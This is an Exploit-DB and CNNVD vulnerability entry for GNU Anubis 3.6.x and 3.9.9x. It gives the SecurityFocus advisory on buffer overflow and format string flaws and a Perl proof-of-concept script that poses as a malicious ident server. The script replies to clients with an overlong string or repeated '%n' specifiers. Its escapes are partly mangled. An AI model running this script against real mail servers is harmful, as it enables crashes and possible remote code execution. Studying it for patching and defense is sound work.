https://www.exploit-db.com/exploits/23771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200411-096

GNUAnubis3.6.0到3.6.2，3.9.92和3.9.93版本存在多个格式化字符串漏洞。远程攻击者可以借助传递到（1）log.c的info函数，（2）errs.c的anubis_error函数，或者（3）ssl.c的ssl_error函数的字符串说明符执行任意代码。

source: http://www.securityfocus.com/bid/9772/info

GNU Anubis has been reported prone to multiple buffer overflow and format string vulnerabilities. It has been conjectured that a remote attacker may potentially exploit these vulnerabilities to have arbitrary code executed in the context of the Anubis software. The buffer overflow vulnerabilities exist in the 'auth_ident' function in 'auth.c'. The format string vulnerabilities are reported to affect the 'info' function in 'log.c', the 'anubis_error' function in 'errs.c' and the 'ssl_error' function in 'ssl.c'.

These vulnerabilities have been reported to exist in GNU Anubis versions 3.6.0, 3.6.1, 3.6.2, 3.9.92, and 3.9.93. It is possible that other versions are affected as well.

These issues are undergiong further analysis, they will be divided into separate BIDs as analysis is completed.

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;


sub usage()
{
  die "usage: $0 typen".
      "type is 'a' (buffer overflow) or 'b' (format string bug).n";
} # sub usage


$port = 113;

usage() unless @ARGV == 1;
$type = shift;
usage() unless $type =~ m|^[ab]$|;

$send{'a'} = 'U' x 400;
$send{'b'} = '%n' x 28;
$sendstr = $send{$type};

$server = IO::Socket::INET->new(Proto => 'tcp',
                                LocalPort => $port,
                                Listen => SOMAXCONN,
                                Reuse => 1) or
          die "can't create server: $!";

while ($client = $server->accept())
{
  $client->autoflush(1);
  print "got a connectionn";

  $input = <$client>;
  $input =~ tr/1512//d;
  print "client said $inputn";

#  $wait = <STDIN>;
#  $wait = 'be quiet, perl -wc';

  $output = "a: USERID: a:$sendstr";
  print $client "$outputn";
  print "I said $outputn";

  close $client;
  print "disconnectedn";
} # while client=server->accept

来源:BID
名称:9772
链接:http://www.securityfocus.com/bid/9772
来源:XF
名称:anubis-format-string(15346)
链接:http://xforce.iss.net/xforce/xfdb/15346
来源:BUGTRAQ
名称:20040304GNUAnubisbufferoverflowsandformatstringbugs
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107843915424588&w;=2
来源:MLIST
名称:[bug-anubis]20040228Importantsecurityupdate
链接:http://mail.gnu.org/archive/html/bug-anubis/2004-02/msg00000.html